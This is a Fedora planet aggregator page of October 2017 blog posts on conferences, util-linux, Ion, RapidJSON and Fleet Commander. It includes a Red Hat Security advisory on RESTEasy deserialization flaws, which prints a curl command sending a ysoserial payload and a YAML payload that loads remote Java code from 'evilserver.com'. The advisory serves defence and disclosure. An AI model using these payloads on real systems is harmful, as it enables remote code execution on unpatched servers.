20 Oct 2017

Fedora People

Wolnei Tomazelli Junior: Thursday, 19 Oct, was the second day of LatinoWare, and the temperature dropped to 25ºC after a heavy storm...

Thursday, 19 Oct, was the second day of LatinoWare, and the temperature dropped to 25ºC after a heavy storm. Unfortunately, part of the event infrastructure was damaged, but happily, after some hard work, everything was back to normal by 1 pm today.
We had our first FudMeeting in room Venezuela, from 10 am to 5 pm, with many great talks about Ansible, oVirt, ARM, how to start contributing, packaging, and translation. As a result of this day, the Fedora Project will gain one more translator and website contributor.
Close to our room, many children were playing with educational robotics, using Fedora Robotics to upload their code to their ARM boards.
Closing the day, ITAIPU employees offered us a nice pizza dinner and an amazing surprise: a live show by a rock band. The band played many Brazilian rock classics very well and got everyone up to dance and sing together.

http://latinoware.org/1o-fudmeeting/ #fedora #latinoware #linux


20 Oct 2017 2:15am GMT

19 Oct 2017

Fedora People

Justin W. Flory: Resigning from Fedora Council for Fedora 27


Since I became a Fedora contributor in August 2015, I've spent a lot of time in the community. One of the great things about a big community like Fedora is that there are several different things to try out. I've always tried to make my contributions where they help Fedora the most. I prefer to make long-term, in-depth contributions rather than short-term, "quick fix"-style work. However, like many others, Fedora is a project I contribute to in my free time. Over the last month, I've come to a difficult realization.

After deep consideration, I am resigning from the Fedora Council effective at the end of the Fedora 26 release cycle.

Why I'm stepping back

When I decided to run for Fedora Council in July, I had not yet moved back to Rochester, New York. From my past experiences, I didn't anticipate any issue fulfilling my commitments to the Fedora community. However, since moving back to Rochester, it has become difficult to meet my commitments to Fedora, Council and otherwise.

I'm entering the last years of my degree and the rigor of my coursework demands more time and focus. Additionally, I'm working more hours this year than I have in the past, which takes away more time from Fedora. Because student loans are all too real.

If I had expected these changes, I would not have run for the Council. However, from my short time on the Council, I understand the energy and dedication needed to represent the community effectively. During my campaign and term, this was my driving motivation - to do my best to represent an international community of thousands in the highest body of leadership in Fedora. Now, I do not feel I am meeting my standard of participation and engagement. I had already stepped back from the Fedora Magazine and Marketing teams to focus more time on other areas of Fedora. Now, it is right to do the same for the Council.

I will spend the most time in the CommOps and Diversity teams, since I believe that is where I can make the largest impact as a contributor.

Fedora 27 Council elections

I privately shared my resignation with the Fedora Council before writing this post. After discussing with other Council members, the plan is

  1. Elect a new, full-term Council member for Fedora 27 and 28
  2. Elect a new, half-term Council member for only Fedora 27

In past elections with half-term seats, the candidate with the most votes receives the full-term seat and the runner-up receives the half-term seat. I expect this to happen again, although final details will come once the election phase begins.

Thank you for your trust

This is one of the most difficult decisions I've made in Fedora. Serving on the Fedora Council is the greatest privilege. My election to the Council by hundreds of people was humbling and inspired me to not only lead by example, but represent the perspective of the greater Fedora community to the Council. This was the greatest honor for me and it disappoints me to finish my term early.

However, based on current circumstances, I believe this is the best path forward to make sure the community is well-represented in Fedora leadership. Thank you for your trust and I hope I can return to serve the community in this capacity someday in the future.

The post Resigning from Fedora Council for Fedora 27 appeared first on Justin W. Flory's Blog.

19 Oct 2017 9:08pm GMT

Fernando Espinoza: How to configure your devices to protect your privacy.

Computers, smartphones, and Internet-connected gadgets have made our lives easier, to the point where we would be lost without them. On the other hand, the more we rely on them, the more data passes through them and potentially out of our control. Unfortunately, these devices are often poorly protected by the... Continue reading →

19 Oct 2017 8:03pm GMT

Christian F.K. Schaller: Looking back at Fedora Workstation so far

So I have blogged regularly over the last few years about upcoming features in Fedora Workstation. As we are putting the finishing touches on Fedora Workstation 27, I thought I should try to look back at everything we have achieved since Fedora Workstation launched with Fedora 21. The efforts I highlight here are ones where we did significant or most of the development. There are of course a lot of other big changes that have happened over the last few years, made by the wider community, that we leveraged and offer in Fedora Workstation; examples include things like Meson and Rust. This post is not about those, but that said, I do want to write a post at some point just about the achievements of the wider community, because they are very important and crucial too. Along the same lines, this post will not cover the large number of improvements and bugfixes that we contributed to a long list of projects, like GNOME itself. This blog is about taking stock and taking some pride in what we achieved so far, and the major hurdles we passed on our way to improving the Linux desktop experience.
This post is also slightly different from my normal format, as I will not call out individual developers by name as I usually do; instead I will focus on this as a totality and just say 'we'.

I am sure I missed something, but this is at least a decent list of Fedora Workstation highlights for the last few years. Next onto working on my Fedora Workstation 27 blogpost :)

19 Oct 2017 6:35pm GMT

Laura Abbott: Splitting the Ion heaps

One of the requests before Ion moves out of staging is to split the /dev interface into multiple nodes. The way Ion allocation currently works is by calling ioctls on /dev/ion. This certainly works but requires that Ion have a fairly permissive set of privileges. There's not an easy[1] way to restrict access to certain heaps. Splitting access out into /dev/ion0, /dev/ion1, etc. makes it possible to set Unix and SELinux permissions per heap. Benjamin Gaignard has been working on some proposals to make this work.
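With per-heap device nodes, standard udev rules could then scope access. For example, a rule along these lines (the group name is hypothetical, and the ion[0-9]* node names assume the proposed split goes in as described):

```
# /etc/udev/rules.d/99-ion-heaps.rules -- hypothetical example
KERNEL=="ion[0-9]*", MODE="0660", GROUP="graphics"
```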

I decided to give this a boot and run a few tests. Everything came up okay in my buildroot based environment but I didn't see /dev/ion0, /dev/ion1 on my Android system. Creation of the device nodes is the responsibility of userspace so it wasn't too surprising to see at least some problems. On most systems, this is handled by some subset of udev, which might be part of systemd or some other init subsystem. Android being Android uses its own setup for device initialization.

My preferred Android board these days is a HiKey development board. Linaro has done a fantastic job of getting support for this board in AOSP so I can work off of AOSP master or one of the branches to do development. By default, AOSP ships a binary kernel module based on whatever branch they are shipping but John Stultz keeps a git tree with a branch that tracks mainline pretty closely. With this setup, I can recompile and test almost any part of the system I want (except for the Mali blobs of course).

The Android init system provides an option to log uevents. This was useful for seeing exactly what was going on. The logs showed the init system probing some typical set of the /sys hierarchy. The Ion nodes weren't on that list though, so the Android init system wasn't finding it in /sys. This is what I found in /sys/devices/ on my qemu setup:

# ls /sys/devices/
LNXSYSTM:00  ion0         msr          platform     software     tracepoint
breakpoint   ion1         pci0000:00   pnp0         system       virtual

ion0 and ion1 are present in the /sys hierarchy but not where one might have expected. This was a side-effect of how the underlying devices were set up in the kernel. I'm not very familiar with the device model so I'm hoping to see more feedback on a proper solution. Progress always takes time...

  1. You can do some filtering with seccomp but that's not the focus here.

19 Oct 2017 6:00pm GMT

Karel Zak: util-linux v2.31 -- what's new?

uuidparse -- this is a new small command to get more information about UUIDs. The command provides info about the UUID type, variant and time. For example:

$ (uuidgen; uuidgen -t) | uuidparse
8f251893-d33a-40f7-9bb3-36988ec77527 DCE random
66509634-b404-11e7-aa8e-7824af891670 DCE time-based 2017-10-18 15:01:04,751570+0200

The command su has been refactored and extended to create a pseudo-terminal for the session (new option --pty). The reason is CVE-2016-2779, but the issue addressed by this CVE is pretty old, and the problem has been silently ignored for years in many places (not only in su(1)). The core of the problem is that the unprivileged user (within the su(1) session) shares a terminal file descriptor with the original root session. The new option --pty forces su(1) to create an independent pseudo-terminal for the session, and then su(1) works as a proxy between the terminals. The feature is experimental and not enabled by default (you have to use su --pty).

standard su session (all on pts/0):

24909 pts/0 S 0:02 \_ -bash
13607 pts/0 S 0:00 \_ su - kzak
13608 pts/0 S 0:00 \_ -bash
13679 pts/0 R+ 0:00 \_ ps af

su --pty session (root pts/0; user pts/5):

24909 pts/0 S 0:02 \_ -bash
13857 pts/0 S+ 0:00 \_ su --pty - kzak
13858 pts/5 Ss 0:00 \_ -bash
13921 pts/5 R+ 0:00 \_ ps af

rfkill -- this is a new command in util-linux. The command was originally written by Johannes Berg and Marcel Holtmann and maintained for years as a standalone package. We believe that it's better to maintain and distribute it together with the other commands in one place. The util-linux version is backward compatible with the original implementation. The command has also been improved (libsmartcols output, etc.). The new default output:
# rfkill       
0 bluetooth tpacpi_bluetooth_sw unblocked unblocked
1 wlan phy0 unblocked unblocked
4 bluetooth hci0 blocked unblocked

The library libuuid and the command uuidgen now support hash-based UUIDs v3 (MD5) and v5 (SHA-1) as specified by RFC 4122. The library also provides UUID templates for dns, url, oid, and x500. For example:
$ uuidgen --sha1 --namespace @dns --name foobar.com

Version 3 and version 5 UUIDs are expected to be used hierarchically, so you can use this UUID (or any other UUID) as a namespace:

$ uuidgen --sha1 --namespace e361e3ab-32c6-58c4-8f00-01bee1ad27ec --name mystuff

I can imagine a system where, for example, per-user or per-architecture partition UUIDs are based on this scheme. For example, use a UUID specific to the system root as --namespace and the username as --name.
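The same hash-based scheme is available in Python's standard uuid module, which is handy for sanity-checking uuidgen output or generating such hierarchical UUIDs from a script (a sketch of the idea above; "mystuff" is just the example name from the post):

```python
import uuid

# v5 (SHA-1) UUID from the well-known DNS namespace, equivalent in spirit to:
#   uuidgen --sha1 --namespace @dns --name foobar.com
ns = uuid.uuid5(uuid.NAMESPACE_DNS, "foobar.com")

# hash-based UUIDs are deterministic: same namespace + name, same UUID
assert ns == uuid.uuid5(uuid.NAMESPACE_DNS, "foobar.com")

# and they chain: use the result as the namespace for the next level,
# e.g. deriving a per-user UUID from a system-root UUID
per_user = uuid.uuid5(ns, "mystuff")
print(ns, per_user)
```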

wipefs and libblkid have been improved to report all detectable signatures on a device. This means that wipefs does not stop at the first detected signature, but continues and tries other offsets for signatures. This is important for filesystems and partition tables where the superblock is backed up in multiple places (e.g. GPT) or detectable in multiple independent ways (FATs). All this is possible without modifying the device (the old version provided the same, but only in "wipe" mode).

libfdisk has been extended to use the BLKPG ioctls to inform the kernel about changes. This means that cfdisk and fdisk will no longer force your kernel to re-read the whole partition table; untouched partitions may remain mounted and in use by the system. The typical use-case is resizing the last partition on the system disk.

You can use cfdisk to resize a partition. Yep, cool.

The hwclock command now significantly reduces system shutdown times by not reading the RTC before setting it (except when the --update-drift option is used). This also mitigates other potential shutdown and RTC setting problems caused by requiring an RTC read.

19 Oct 2017 1:23pm GMT

Daniel Pocock: FOSDEM 2018 Real-Time Communications Call for Participation

FOSDEM is one of the world's premier meetings of free software developers, with over five thousand people attending each year. FOSDEM 2018 takes place 3-4 February 2018 in Brussels, Belgium.

This email contains information about:

  • Real-Time communications dev-room and lounge,
  • speaking opportunities,
  • volunteering in the dev-room and lounge,
  • related events around FOSDEM, including the XMPP summit,
  • social events (the legendary FOSDEM Beer Night and Saturday night dinners provide endless networking opportunities),
  • the Planet aggregation sites for RTC blogs

Call for participation - Real Time Communications (RTC)

The Real-Time dev-room and Real-Time lounge is about all things involving real-time communication, including: XMPP, SIP, WebRTC, telephony, mobile VoIP, codecs, peer-to-peer, privacy and encryption. The dev-room is a successor to the previous XMPP and telephony dev-rooms. We are looking for speakers for the dev-room and volunteers and participants for the tables in the Real-Time lounge.

The dev-room is only on Sunday, 4 February 2018. The lounge will be present for both days.

To discuss the dev-room and lounge, please join the FSFE-sponsored Free RTC mailing list.

To be kept aware of major developments in Free RTC, without being on the discussion list, please join the Free-RTC Announce list.

Speaking opportunities

Note: if you used FOSDEM Pentabarf before, please use the same account/username

Real-Time Communications dev-room: deadline 23:59 UTC on 30 November. Please use the Pentabarf system to submit a talk proposal for the dev-room. On the "General" tab, please look for the "Track" option and choose "Real Time Communications devroom". Link to talk submission.

Other dev-rooms and lightning talks: some speakers may find their topic is in the scope of more than one dev-room. You are encouraged to apply to more than one dev-room and also to consider proposing a lightning talk, but please be kind enough to tell us if you do this by filling out the notes in the form.

You can find the full list of dev-rooms on this page and apply for a lightning talk at https://fosdem.org/submit

Main track: the deadline for main track presentations is 23:59 UTC 3 November. Leading developers in the Real-Time Communications field are encouraged to consider submitting a presentation to the main track.

First-time speaking?

FOSDEM dev-rooms are a welcoming environment for people who have never given a talk before. Please feel free to contact the dev-room administrators personally if you would like to ask any questions about it.

Submission guidelines

The Pentabarf system will ask for many of the essential details. Please remember to re-use your account from previous years if you have one.

In the "Submission notes", please tell us about:

  • the purpose of your talk
  • any other talk applications (dev-rooms, lightning talks, main track)
  • availability constraints and special needs

You can use HTML and links in your bio, abstract and description.

If you maintain a blog, please consider providing us with the URL of a feed with posts tagged for your RTC-related work.

We will be looking for relevance to the conference and dev-room themes: presentations aimed at developers of free and open source software, about RTC-related topics.

Please feel free to suggest a duration between 20 minutes and 55 minutes but note that the final decision on talk durations will be made by the dev-room administrators based on the received proposals. As the two previous dev-rooms have been combined into one, we may decide to give shorter slots than in previous years so that more speakers can participate.

Please note FOSDEM aims to record and live-stream all talks. The CC-BY license is used.

Volunteers needed

To make the dev-room and lounge run successfully, we are looking for volunteers:

  • FOSDEM provides video recording equipment and live streaming, volunteers are needed to assist in this
  • organizing one or more restaurant bookings (depending upon the number of participants) for the evening of Saturday, 3 February
  • participation in the Real-Time lounge
  • helping attract sponsorship funds for the dev-room to pay for the Saturday night dinner and any other expenses
  • circulating this Call for Participation (text version) to other mailing lists

Related events - XMPP and RTC summits

The XMPP Standards Foundation (XSF) has traditionally held a summit in the days before FOSDEM. There is discussion about a similar summit taking place on 2 February 2018. XMPP Summit web site - please join the mailing list for details.

Social events and dinners

The traditional FOSDEM beer night occurs on Friday, 2 February.

On Saturday night, there are usually dinners associated with each of the dev-rooms. Most restaurants in Brussels are not so large so these dinners have space constraints and reservations are essential. Please subscribe to the Free-RTC mailing list for further details about the Saturday night dinner options and how you can register for a seat.

Spread the word and discuss

If you know of any mailing lists where this CfP would be relevant, please forward this email (text version). If this dev-room excites you, please blog or microblog about it, especially if you are submitting a talk.

If you regularly blog about RTC topics, please send details about your blog to the planet site administrators:

Planet sites and admin contacts:

  • All projects: Free-RTC Planet (http://planet.freertc.org), contact planet@freertc.org
  • XMPP: Planet Jabber (http://planet.jabber.org), contact ralphm@ik.nu
  • SIP: Planet SIP (http://planet.sip5060.net), contact planet@sip5060.net
  • SIP (Español): Planet SIP-es (http://planet.sip5060.net/es/), contact planet@sip5060.net

Please also link to the Planet sites from your own blog or web site as this helps everybody in the free real-time communications community.


For any private queries, contact us directly using the address fosdem-rtc-admin@freertc.org and for any other queries please ask on the Free-RTC mailing list.

The dev-room administration team:

19 Oct 2017 8:33am GMT

Fedora Community Blog: Teaching metrics and contributor docs at Flock 2017

The Fedora Community Operations (CommOps) team held an interactive workshop during the annual Fedora contributor conference, Flock. Flock took place from August 29th to September 1st in Cape Cod, Massachusetts. Justin W. Flory and Sachin Kamath represented the team in the workshop. CommOps spends a lot of time working with metrics and data tools available in Fedora, like fedmsg and datagrepper. Our workshop introduced some of the tools to work with metrics in Fedora and how to use them. With our leftover time, we discussed the role of contributor-focused documentation in the wiki and moving it to a more static place in Fedora documentation.

What does CommOps do?

The beginning of the session introduced the CommOps team and explained our function in the Fedora community. There are two different skill areas in the CommOps team: one focuses on data analysis and the other focuses on non-technical community work. The motivation for CommOps was explained too. The team's mission is to bring more heat and light into the project, where light is exposure and awareness, and heat is more activity and contributions. Our work usually follows this mission for either technical or non-technical tasks.

At the beginning of the workshop, metrics were the main discussion point. CommOps helps generate metrics and statistical reports about activity in Fedora. We wanted to talk more about the technical tools we use and how others in the workshop could use them for their own projects in Fedora.

What are Fedora metrics?

fedmsg is the foundation for all metrics in Fedora. fedmsg is a message bus that connects the different applications in Fedora together. All applications and tools used by Fedora contributors emit messages onto fedmsg. This includes git commits, Koji build status, Ansible playbook runs, adding a member to a FAS group, new translations, and more. Taken all together, the raw data is overwhelming and difficult to understand. In the #fedora-fedmsg channel on Freenode, you can see all the fedmsg activity in the project (you can see the project "living"!). The valuable part is when you take the data and filter it down into something meaningful.
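To make that concrete, every message on the bus is a JSON payload under a namespaced topic. A simplified sketch of a single fedmsg message (fields abridged and values invented for illustration; real messages carry more metadata):

```json
{
  "topic": "org.fedoraproject.prod.git.receive",
  "timestamp": 1508400000,
  "msg": {
    "commit": {
      "username": "example-user",
      "repo": "example-package",
      "branch": "master"
    }
  }
}
```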

One of the examples from the workshop was the analysis of FOSDEM and community engagement by CommOps contributor Bee Padalkar. In her report, she determined our approximate impact on the community at FOSDEM. Using Fedora Badges data, she showed how many people we interacted with at FOSDEM and how they engaged with the Fedora community before and after the conference.

The metrics tools in Fedora help make this research possible. One of the primary goals of our workshop was to introduce the metrics tools and how to use them for the audience. We hoped to empower people to build and generate metrics of their own. We also talked about some of the plans by the team to advance use of metrics further.

Introducing the CommOps toolbox

The CommOps toolbox is a valuable resource for the data side of CommOps. Our virtual toolbox is a list of all the metrics and data tools available for use and a short description of how they're used. You can see the toolbox on the wiki.

Sachin led this part of the workshop and explained some of the most common tools. He introduced what a fedmsg publication looked like and helped explain the structure of the data. Next, he introduced Datagrepper. Datagrepper helps you pull fedmsg data based on a set of filters. With your own filters, you can customize the data you see to make comparisons easier. Complex queries with Datagrepper are powerful and help bring insights into various parts of the project. When used effectively, it provides insight into potential weak spots in a Fedora-related project.
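Since Datagrepper is a plain HTTP API, building a query needs nothing more than the standard library. A small sketch (the endpoint URL and parameter names such as user, category and delta follow the hosted Fedora Datagrepper instance; the username is hypothetical):

```python
from urllib.parse import urlencode

# public Datagrepper endpoint (assumed from the hosted Fedora instance)
DATAGREPPER_RAW = "https://apps.fedoraproject.org/datagrepper/raw"

def build_query(**filters):
    """Build a Datagrepper /raw query URL from filters such as
    user=, category=, topic= and delta= (seconds of history)."""
    return DATAGREPPER_RAW + "?" + urlencode(sorted(filters.items()))

# e.g. all git activity by one (hypothetical) user over the last day
url = build_query(user="example-user", category="git", delta=86400)
print(url)
# fetching the JSON is then just:
#   import json, urllib.request
#   data = json.load(urllib.request.urlopen(url))
```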

Finally, Sachin also introduced his Google Summer of Code (GSoC) 2016 project, gsoc-stats. gsoc-stats is a special set of pre-defined filters to create contribution profiles for individual contributors. It breaks down where a contributor spends most of their time in the project and what type of work they do. Part of its use was for GSoC student activity measurements, but it has other uses as well.

What is Grimoire Lab?

Sachin is leading progress on a new tool for CommOps called Grimoire Lab. Grimoire Lab is a visual dashboard tool that lets a user create charts, graphs, and visual measurements from a common data source. The vision for Grimoire Lab in Fedora is to build an interactive dashboard based on fedmsg data. Using the data, anyone could create different gauges and measurements in an easy-to-understand chart or graph. This helps make the fedmsg data more accessible for others in the project to use, without making them write their own code to create graphic measurements.

Most of the Grimoire Lab time in the workshop went to explaining its purpose and expected use. Sachin explained some of the progress made so far to make the tool available in Fedora. The goal is to get it hosted inside Fedora's infrastructure next. We hope to deliver an early preview of this over the next year.

Changing the way we write contributor documentation

The end of our workshop focused on non-technical tasks. We had a few tickets highlighted but left the discussion open to the audience's interests. One of the attendees, Brian Exelbierd, started a discussion about the Fedora Documentation team and some of the changes they've made over the last year. Brian introduced AsciiDoc and broke down the workflow that the Docs team uses with the new tooling. After explaining it, the idea came up of hosting contributor-focused information in a Fedora Docs-style project, instead of the wiki.

The two strong benefits of this approach are keeping valuable information updated and making it easily accessible. Some common wiki pages for the CommOps team came up, like the pages explaining how to join the team and how to get "bootstrapped" in Fedora. After Brian's explanation of the tools, the new Docs tool chain felt easy to keep up with and effective at promoting high-value content for contributors out of the wiki. Later during Flock, on Thursday evening, Brian organized a mini workshop to extend this idea further and teach attendees how to port content over.

CommOps hopes to be an early example of a team using this style of documentation for our contributor-focused content. Once we are comfortable with the set-up and have something to show others, we want to document how we did it and explain how other teams can do it too. We hope to carry this out over the Fedora 27 release cycle.

See you next year!

Flock 2017 was a conference full of energy and excitement. The three-hour workshop was useful and effective for CommOps team members to meet and work out plans for the next few release cycles in the same room. In addition to our own workshop, spending time in other workshops was also valuable for our team members to see what others in Fedora are doing and where they need help.

A special thanks goes out to all the organizing staff, for both the bid process and during the conference. Your hard work helps drive our community forward every year by making it feel more like a community of people, in an open source world where we mostly interact and work together over text messaging clients and email.

We hope to see you next year to show you what we accomplished since last Flock!

The post Teaching metrics and contributor docs at Flock 2017 appeared first on Fedora Community Blog.

19 Oct 2017 8:30am GMT

Wolnei Tomazelli Junior: Today, Wednesday, 18 Oct, was the first day of the fourteenth edition of LatinoWare, hosted in the city of Foz ...

Today, Wednesday, 18 Oct, was the first day of the fourteenth edition of LatinoWare, hosted in the city of Foz do Iguaçu in Paraná state, with 4552 participants and a temperature of 37ºC. Currently this is the biggest free software event in Brazil.
Early in the morning we took the Latinoware bus to the Itaipu Technological Park. We set up the Fedora Project stand with a banner and five types of stickers for the winners of a traditional quiz. Each of the ambassadors present at our stand came up with a question about Fedora to ask participants.
Between rounds of our quick quiz, many people came by our stand to ask questions about using Fedora or how to contribute to some of our projects; today we pointed one more person to start contributing to the Translation team.
At the end of the morning, at 11 am in room Peru, Daniel Lara gave his first talk, about virtualization for users, where he tried to convince people to use KVM instead of VirtualBox. At lunch hour, 12 pm in room Brazil, Dennis Gilmore gave his first talk, about what open source can do for you and for the world, where he shared his experience of developing free software for more than twenty years.
For the rest of my afternoon, I helped with a Fedora 64-bit Workstation installation on a notebook and demonstrated the KDE interface to an undecided user.

#fedora #latinoware #linux #FozIguacu


19 Oct 2017 12:10am GMT

18 Oct 2017

Fedora People

Adam Young: Deliberate Elevation of Privileges

"Ooops." - Me, doing something as admin that I didn't mean to do.

While the sudo mechanism has some warranted criticism, it is still an improvement on doing everything as the root account. The essential addition that sudo provides for the average sysadmin is the ability to grant themselves system admin rights only when they explicitly want them.

I was recently thinking about a FreeIPA-based cluster where the users did not realize that they could get admin permissions by adding themselves to the admins user group. One benefit of the centralized admin account is that a user has to choose to operate as admin to perform an operation. If a hacker gets a user's password, they do not get admin. However, the number of attacks and weaknesses in this approach far outweighs the benefits: multiple people need to know the password, revoking it for one revokes it for everyone, anyone can change the password, locking everyone else out, and so on.

We instead added a few key individuals to the admins group and changed the password on the admin account.

This heightened degree of security supports the audit trail. Now if someone performs an admin operation, we know which user did it. It involves enabling audit on the Directory Server (I need to learn how to do this!).

It got me thinking, though: could we implement a mechanism like the sudo approach that lets users temporarily elevate themselves to admin status? Something like a short-term group membership. The requirements, as I see them, are these:

  1. A user has to choose to be admin: "admin-powers activate!"
  2. A user can downgrade back to non-admin at any point: "admin-powers deactivate!"
  3. Admin powers wear off: admin-powers only last an hour
  4. No new password has to be memorized for admin-powers
  5. The mechanism for admin-powers has to be resistant to attack:
    1. customizable enough that someone outside the organization can't guess what it is.
    2. provide some way to prevent shoulder surfing.
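The first three requirements amount to time-limited group membership. As a rough illustration only (this is my sketch, not the author's strawman; the actual group-management backend, e.g. FreeIPA, is left abstract):

```python
import time

ADMIN_TTL = 3600  # requirement 3: admin powers only last an hour

class AdminPowers:
    """Track which users hold temporary admin membership, and until when."""

    def __init__(self, now=time.time):
        self.now = now      # injectable clock (makes the expiry testable)
        self.expires = {}   # user -> expiry timestamp

    def activate(self, user):
        # requirement 1: the user has to choose to be admin
        self.expires[user] = self.now() + ADMIN_TTL

    def deactivate(self, user):
        # requirement 2: downgrade back to non-admin at any point
        self.expires.pop(user, None)

    def is_admin(self, user):
        return self.now() < self.expires.get(user, 0)

powers = AdminPowers()
powers.activate("alice")
print(powers.is_admin("alice"))   # True while the hour lasts
powers.deactivate("alice")
print(powers.is_admin("alice"))   # False immediately after deactivation
```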

I'm going to provide a straw-man here.

As I said, a strawman, but I think it points in the right direction. Thoughts?

18 Oct 2017 7:31pm GMT

Subhendu Ghosh: Understanding RapidJson – Part 2

In my previous blog on RapidJSON, a lot of people asked for a detailed example in the comments, so here is part 2 of Understanding RapidJSON, with a slightly more detailed example. I hope this helps you all.

We will straightaway improve on the last example from the previous blog and modify the changeDom function to add a more complex object to the DOM tree.

template <typename Document>
void changeDom(Document& d) {
    Value& node = d["hello"];
    node = "c++";                       // matches the "After" output below
    Document subdoc(&d.GetAllocator()); // sub-document sharing the main allocator
    subdoc.SetObject();                 // starting the object
    Value arr(kArrayType);              // the innermost array
    Value::AllocatorType& allocator = subdoc.GetAllocator();
    for (unsigned i = 0; i < 10; i++)
        arr.PushBack(i, allocator);     // PushBack expects an allocator object
    // add the array to its parent object, then add that to the sub-document
    Value obj(kObjectType);
    obj.AddMember("Numbers", arr, allocator);
    subdoc.AddMember("New", obj, allocator);
    d.AddMember("testing", subdoc, d.GetAllocator()); // finally attach the sub-document to the main doc
    d["t"] = false;
    d["f"] = true;
}

Here we create Value objects of type kArrayType and kObjectType and append them to their parent node, from innermost to outermost.

Before Manipulation

{
    "hello": "world",
    "t": true,
    "f": false,
    "n": null,
    "i": 123,
    "pi": 3.1416,
    "a": [1, 2, 3, 4]
}

After Manipulation

{
    "hello": "c++",
    "t": false,
    "f": true,
    "n": null,
    "i": 123,
    "pi": 3.1416,
    "a": [1, 2, 3, 4],
    "testing": {
        "New": {
            "Numbers": [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
        }
    }
}

The above changeDom can also be written using a PrettyWriter object as follows:

template <typename Document>
void changeDom(Document& d) {
    Value& node = d["hello"];
    node = "c++";
    Document subdoc(&d.GetAllocator()); // sub-document
    // old school: write the JSON element by element
    StringBuffer s;
    PrettyWriter<StringBuffer> writer(s);
    writer.StartObject();
    writer.Key("New");
    writer.StartObject();
    writer.Key("Numbers");
    writer.StartArray();
    for (unsigned i = 0; i < 10; i++)
        writer.Uint(i);
    writer.EndArray();
    writer.EndObject();
    writer.EndObject();
    subdoc.Parse(s.GetString()); // parsing the string written to the buffer to form a sub-DOM
    d.AddMember("testing", subdoc, d.GetAllocator()); // attaching the sub-DOM to the main DOM object
    d["t"] = false;
    d["f"] = true;
}

Happy Coding! Cheers.

18 Oct 2017 2:38pm GMT

Red Hat Security: Abuse of RESTEasy Default Providers in JBoss EAP

Red Hat JBoss Enterprise Application Platform (EAP) is a commonly used host for Restful webservices. A powerful but potentially dangerous feature of Restful webservices on JBoss EAP is the ability to accept any media type. If not configured to accept only a specific media type, JBoss EAP will dynamically process a request with the default provider matching the Content-Type HTTP header which the client specifies. Some of the default providers were found to have vulnerabilities, which have now been removed from JBoss EAP and its upstream Restful webservice project, RESTEasy.

The attack vector

There are two important vulnerabilities fixed in the RESTEasy project in 2016 which utilized default providers as an attack vector. CVE-2016-7050 was fixed in version 3.0.15.Final, while CVE-2016-9606 was fixed in version 3.0.22.Final. Both vulnerabilities took advantage of the default providers available in RESTEasy. They relied on a webservice endpoint doing any one of the following:

  • @Consumes annotation was present specifying wildcard mediaType {*/*}
  • @Consumes annotation was not present on webservice endpoint
  • Webservice endpoint consumes a multipart mediaType

Here's an example of what a vulnerable webservice would look like:

import java.util.*;
import javax.ws.rs.*;
import javax.ws.rs.core.*;

@Path("/")
public class PoC_resource {

        @POST
        @Path("/concat")
        public Map<String, String> doConcat(Pair pair) {
                HashMap<String, String> result = new HashMap<String, String>();
                result.put("Result", pair.getP1() + pair.getP2());
                return result;
        }
}
Notice how there is no @Consumes annotation on the doConcat method.

The vulnerabilities

CVE-2016-7050 took advantage of the deserialization capabilities of SerializableProvider. It was fixed upstream [1] before Product Security became aware of it. Luckily, the RESTEasy version used in the supported version of JBoss EAP 7 was later than 3.0.15.Final, so it was not affected. It was reported to Red Hat by Mikhail Egorov of Odin.

If a Restful webservice endpoint wasn't configured with a @Consumes annotation, an attacker could utilize the SerializableProvider by sending an HTTP request with a Content-Type of application/x-java-serialized-object. The body of that request would be processed by the SerializableProvider and could contain a malicious payload generated with ysoserial [2] or similar. Remote code execution on the server could then occur, as long as there was a gadget chain on the classpath of the web service application.

Here's an example:

curl -v -X POST http://localhost:8080/example/concat -H 'Content-Type: application/x-java-serialized-object' -H 'Expect:' --data-binary '@payload.ser'

CVE-2016-9606 also exploited the default providers of RESTEasy. This time it was the YamlProvider which was the target of abuse. This vulnerability was easier to exploit because it didn't require the application to have a gadget chain library on the classpath. Instead, the SnakeYAML library from RESTEasy was being exploited directly to allow remote code execution. This issue was reported to Red Hat Product Security by Moritz Bechler of AgNO3 GmbH & Co. KG.

SnakeYAML allows loading classes with a URLClassLoader, using its ScriptEngineManager feature. With this feature, a malicious actor could host malicious Java code on their own web server and trick the webservice into loading that Java code and executing it.

An example of a malicious request is as follows:

curl -X POST --data-binary '!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://evilserver.com/"]]]]' -H "Content-Type: text/x-yaml" -v http://localhost:8080/example/concat

Where evilserver.com is a host controlled by the malicious actor.

Again, you can see the use of the Content-Type HTTP header, which tricks RESTEasy into using the YamlProvider, even though the developer didn't intend for it to be accessible.

How to stay safe

The latest versions of EAP 6.4.x and 7.0.x are not affected by these issues. CVE-2016-9606 did affect EAP 6.4.x; it was fixed in the 6.4.15 release. CVE-2016-9606 was not exploitable on EAP 7.0.x, but it was possible to exploit on 7.1 and is now fixed in the 7.1.0.Beta release. CVE-2016-7050 affected neither EAP 6.4.x nor 7.0.x.

If you're using an unpatched release of upstream RESTEasy, be sure to specify the mediaType you're expecting when defining the Restful webservice endpoint. Here's an example of an endpoint that would not be vulnerable:

import java.util.*;
import javax.ws.rs.*;
import javax.ws.rs.core.*;

@Path("/")
public class PoC_resource {

        @POST
        @Path("/concat")
        @Consumes("application/json")
        public Map<String, String> doConcat(Pair pair) {
                HashMap<String, String> result = new HashMap<String, String>();
                result.put("Result", pair.getP1() + pair.getP2());
                return result;
        }
}
Notice that this safe version adds a @Consumes annotation with a mediaType of application/json.

This is good practice anyway, because if an HTTP client tries to send a request with a different Content-Type HTTP header, the application will give an appropriate error response, indicating that the Content-Type is not supported.

  1. https://issues.jboss.org/browse/RESTEASY-1269

  2. https://github.com/frohoff/ysoserial



18 Oct 2017 1:30pm GMT

Christian F.K. Schaller: Fleet Commander ready for takeoff!

Alberto Ruiz just announced Fleet Commander as production ready! Fleet Commander is our new tool for managing large deployments of Fedora Workstation and RHEL desktop systems. So head over to Alberto's Fleet Commander blog post for all the details.

18 Oct 2017 12:01pm GMT

Alberto Ruiz: Fleet Commander: production ready!

It's been a while since I last wrote any updates about Fleet Commander, but that's not to say there hasn't been any progress since 0.8. In many senses we (Oliver and I) feel like we should present Fleet Commander as a shiny new project now, as many changes have gone in and this is the first release we feel is robust enough to call production ready.

What is Fleet Commander?

For those missing some background, let me introduce Fleet Commander: an integrated solution for large Linux desktop deployments that provides a centrally controlled configuration management interface covering desktop, application and network configuration. For people familiar with Group Policy Objects in Active Directory on Windows, it is very similar.

